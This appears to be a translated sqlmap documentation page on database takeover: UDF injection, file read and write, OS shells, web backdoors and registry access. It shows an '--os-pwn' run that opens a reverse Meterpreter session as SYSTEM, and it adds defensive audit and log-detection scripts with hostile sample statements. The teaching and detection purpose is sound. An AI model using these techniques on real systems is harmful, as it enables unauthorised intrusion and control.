Please go easy on me, everyone (QAQ)
First published on the XianZhi community: https://xz.aliyun.com/t/3011
Other advanced features
User-defined function injection
Parameters: --udf-inject, --shared-lib
You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library: a DLL on Windows, or a shared object on Linux/Unix.
sqlmap will then ask you a few questions, upload the library to the database server, create the user-defined functions from it and, depending on your choices, execute them. When you are done with the injected UDFs, sqlmap will remove them.
File system access
Read a file from the database server
Parameters: --file-read
Works when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges required by the specific functions involved. The file read can be either a text file or a binary file.
Upload a file to the database server
Parameters: --file-write, --file-dest
Works when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges required by the specific functions involved. The file uploaded can be either a text file or a binary file.
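The UDF injection, file read and file write features above all hinge on the same server-side preconditions on MySQL: the FILE privilege, the secure_file_priv setting, and the ability to register a function from mysql.func. The following audit script is an added example for this page, not sqlmap code, and checks those preconditions from the text output of SHOW GRANTS and SHOW VARIABLES so an administrator can see which of the features would work against a given application account. The grants and variable values embedded in it are constructed sample data.

```python
"""Audit the MySQL preconditions behind sqlmap's --udf-inject, --file-read and
--file-write, using SHOW GRANTS / SHOW VARIABLES output.

Added example for this page; not part of sqlmap. All sample data is constructed.
"""
import re

# Constructed sample: SHOW GRANTS FOR CURRENT_USER() for an over-privileged web account.
SAMPLE_GRANTS = [
    "GRANT FILE ON *.* TO 'webapp'@'%'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'webapp'@'%'",
    "GRANT INSERT ON `mysql`.`func` TO 'webapp'@'%'",
]

# Constructed sample: the two SHOW VARIABLES rows that matter here.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",                 # empty string = no path restriction at all
    "plugin_dir": "/usr/lib/mysql/plugin/",
}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+", re.IGNORECASE)


def parse_grants(lines):
    """Turn SHOW GRANTS lines into (set_of_privileges, scope) tuples."""
    parsed = []
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        scope = m.group("scope").replace("`", "")
        parsed.append((privs, scope))
    return parsed


def has_priv(grants, priv, scope):
    """True if `priv` (or ALL PRIVILEGES) applies to `scope`, its database, or globally."""
    for privs, s in grants:
        matches = s in ("*.*", scope) or (s.endswith(".*") and scope.startswith(s[:-1]))
        if matches and (priv in privs or "ALL PRIVILEGES" in privs or "ALL" in privs):
            return True
    return False


def file_access_state(grants, variables):
    """LOAD_FILE() and SELECT ... INTO OUTFILE/DUMPFILE need FILE and are gated by secure_file_priv."""
    if not has_priv(grants, "FILE", "*.*"):
        return "blocked"
    sfp = variables.get("secure_file_priv")
    if sfp is None or sfp.upper() == "NULL":
        return "blocked"        # server refuses every import/export
    if sfp == "":
        return "exposed"        # any path the mysqld process can reach
    return "restricted"         # confined to that one directory


def audit(grant_lines, variables):
    grants = parse_grants(grant_lines)
    state = file_access_state(grants, variables)
    # CREATE FUNCTION ... SONAME registers the UDF by inserting into mysql.func.
    udf = has_priv(grants, "INSERT", "mysql.func")
    sfp = (variables.get("secure_file_priv") or "").rstrip("/")
    plugin_dir = (variables.get("plugin_dir") or "").rstrip("/")
    # MySQL only loads UDF libraries from plugin_dir, so the uploaded library must
    # be writable there: either no restriction, or secure_file_priv == plugin_dir.
    os_cmd = udf and (state == "exposed" or (state == "restricted" and sfp == plugin_dir))
    return {"file_read": state, "file_write": state, "udf_inject": udf, "os_cmd": os_cmd}


def recommendations(findings):
    """Plain-language fixes for whatever the audit found exposed."""
    advice = []
    if findings["file_read"] != "blocked":
        advice.append("REVOKE FILE ON *.* from the application account and set "
                      "secure_file_priv to NULL or to a dedicated export directory.")
    if findings["udf_inject"]:
        advice.append("REVOKE INSERT ON mysql.func; keep plugin_dir owned by root "
                      "and not writable by the mysqld user.")
    return advice


if __name__ == "__main__":
    result = audit(SAMPLE_GRANTS, SAMPLE_VARIABLES)
    print(result)
    for line in recommendations(result):
        print("-", line)
```

Feed it the real output of SHOW GRANTS FOR CURRENT_USER() and SHOW VARIABLES LIKE 'secure_file_priv' / 'plugin_dir' taken from the account your web application actually uses; an "exposed" file state combined with udf_inject True is exactly the situation the sections above describe.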
Run arbitrary operating system commands
Parameters: --os-cmd, --os-shell
Works when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges required by the specific functions involved.
On MySQL and PostgreSQL, sqlmap uploads a binary library containing the user-defined functions sys_exec() and sys_eval();
once created, these two functions can execute system commands. On Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure:
if it is disabled (the default on Microsoft SQL Server 2005 and later), sqlmap re-enables it, and if it does not exist, sqlmap creates it.
The --os-shell parameter can also simulate a real shell, in which you type the commands you want to execute.
When stacked queries cannot be used (for example, a PHP or ASP application with a MySQL back-end), it may still be possible to create a web backdoor by writing it into a writable directory with INTO OUTFILE. Supported languages:
1. ASP
2. ASP.NET
3. JSP
4. PHP
Working with Meterpreter
Parameters: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path, --tmp-path
Works when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges required by the specific functions involved; sqlmap can then establish a direct TCP connection between the database server and the attacker.
This connection can be an interactive command line or a Meterpreter session. sqlmap generates the shellcode with Metasploit and has four ways to execute it:
1. Execute the Metasploit shellcode in memory through the user-defined sys_bineval() function; supported on MySQL and PostgreSQL. Parameter: --os-pwn.
2. Upload a stand-alone payload and execute it through a user-defined function: sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server. Parameter: --os-pwn.
3. Execute the Metasploit shellcode through an SMB attack (MS08-068), when the privileges sqlmap has obtained are high enough (uid=0 on Linux/Unix, Administrator on Windows). Parameter: --os-smbrelay.
4. Execute the Metasploit payload in memory by overflowing the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004). Parameter: --os-bof.
A MySQL example:
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

[Metasploit ASCII-art banner]

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0

meterpreter > exit
[*] Meterpreter session 1 closed.  Reason: User exit

By default, MySQL on Windows runs as SYSTEM, whereas PostgreSQL runs as a low-privileged user on both Windows and Linux.
Microsoft SQL Server 2000 runs as SYSTEM by default, while 2008 runs mostly as NETWORK SERVICE and sometimes as LOCAL SERVICE.
Windows registry access
Works when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the web application supports stacked queries. Naturally, the user the application connects to the database as also needs privileges to operate on the registry.
Read a registry value. Parameter: --reg-read
Write a registry value. Parameter: --reg-add
Delete a registry value. Parameter: --reg-del
Auxiliary registry options. Parameters: --reg-key, --reg-value, --reg-data, --reg-type
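Everything the OS takeover, Meterpreter and registry sections above do leaves a trace in the database's own query log: a library written with INTO DUMPFILE, a CREATE FUNCTION ... SONAME statement, calls to sys_exec()/sys_eval()/sys_bineval(), LOAD_FILE(), xp_cmdshell being re-enabled through sp_configure, sp_replwritetovarbin, or the xp_reg* extended procedures that registry access on Microsoft SQL Server goes through. The scanner below is an added detection example for this page, not sqlmap code: it matches those statement shapes over MySQL general-log lines and over raw SQL Server statements, and additionally flags a connection whose statements form the write-library, create-function, call-function sequence. The log lines and SQL Server statements embedded in it are constructed samples; the general-log line layout and the xp_reg* procedure names are assumptions about your environment that you should confirm against your own logs.

```python
"""Detect the database-level footprint of the techniques described on this page.

Added example for this page; not part of sqlmap. Sample log lines are constructed.
"""
import re

# One rule per technique named on the page; case-insensitive so obfuscated casing is caught.
RULES = [
    ("udf_create",       re.compile(r"\bCREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I)),
    ("udf_exec",         re.compile(r"\bsys_(?:exec|eval|bineval)\s*\(", re.I)),
    ("file_read",        re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("file_write",       re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I)),
    ("mssql_cmdshell",   re.compile(r"\bxp_cmdshell\b", re.I)),
    ("mssql_reconfigure", re.compile(r"\bsp_configure\b.*\bxp_cmdshell\b", re.I)),
    ("mssql_bof",        re.compile(r"\bsp_replwritetovarbin\b", re.I)),
    ("mssql_registry",   re.compile(r"\bxp_reg(?:read|write|deletevalue|deletekey)\b", re.I)),
]

# Constructed sample in the shape of the MySQL general query log (timestamp, connection id, "Query", SQL).
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t  17 Query\tSELECT id, name FROM products WHERE id = 1
2024-05-01T10:00:02.000000Z\t  17 Query\tSELECT 0x7f454c46 INTO DUMPFILE '/usr/lib/mysql/plugin/libudf.so'
2024-05-01T10:00:03.000000Z\t  17 Query\tCREATE FUNCTION sys_exec RETURNS int SONAME 'libudf.so'
2024-05-01T10:00:04.000000Z\t  17 Query\tSELECT sys_exec('whoami')
2024-05-01T10:00:05.000000Z\t  17 Query\tSELECT LOAD_FILE('/etc/passwd')
2024-05-01T10:00:06.000000Z\t  18 Query\tSELECT COUNT(*) FROM orders
"""

# Constructed sample of raw SQL Server statements (e.g. from an audit or extended-events export).
SAMPLE_MSSQL = [
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "EXEC master..xp_cmdshell 'whoami'",
]

LOG_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+)\s+Query\t(?P<sql>.*)$")


def parse_line(line):
    """Return (connection_id, sql). Lines not in general-log shape are treated as bare SQL."""
    m = LOG_RE.match(line)
    if m:
        return m.group("conn"), m.group("sql")
    return None, line


def scan(lines):
    """Return one hit dict per (line, rule) match, in line order then RULES order."""
    hits = []
    for n, line in enumerate(lines, 1):
        conn, sql = parse_line(line)
        for name, rx in RULES:
            if rx.search(sql):
                hits.append({"line": n, "conn": conn, "rule": name})
    return hits


# The ordered sequence the OS-command feature produces on MySQL/PostgreSQL.
TAKEOVER_CHAIN = ("file_write", "udf_create", "udf_exec")


def takeover_connections(hits):
    """Connection ids whose hits contain the takeover chain as an ordered subsequence."""
    by_conn = {}
    for h in hits:
        by_conn.setdefault(h["conn"], []).append(h["rule"])
    flagged = []
    for conn, rules in by_conn.items():
        idx = 0
        for r in rules:
            if r == TAKEOVER_CHAIN[idx]:
                idx += 1
                if idx == len(TAKEOVER_CHAIN):
                    flagged.append(conn)
                    break
    return flagged


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(h)
    print("takeover chain on connections:", takeover_connections(hits))
    print("mssql hits:", [h["rule"] for h in scan(SAMPLE_MSSQL)])
```

A single file_write or file_read hit is worth a look but can be legitimate (exports, imports); the ordered chain on one connection is a high-confidence signal and should page someone, as should any mssql_reconfigure hit from an application account.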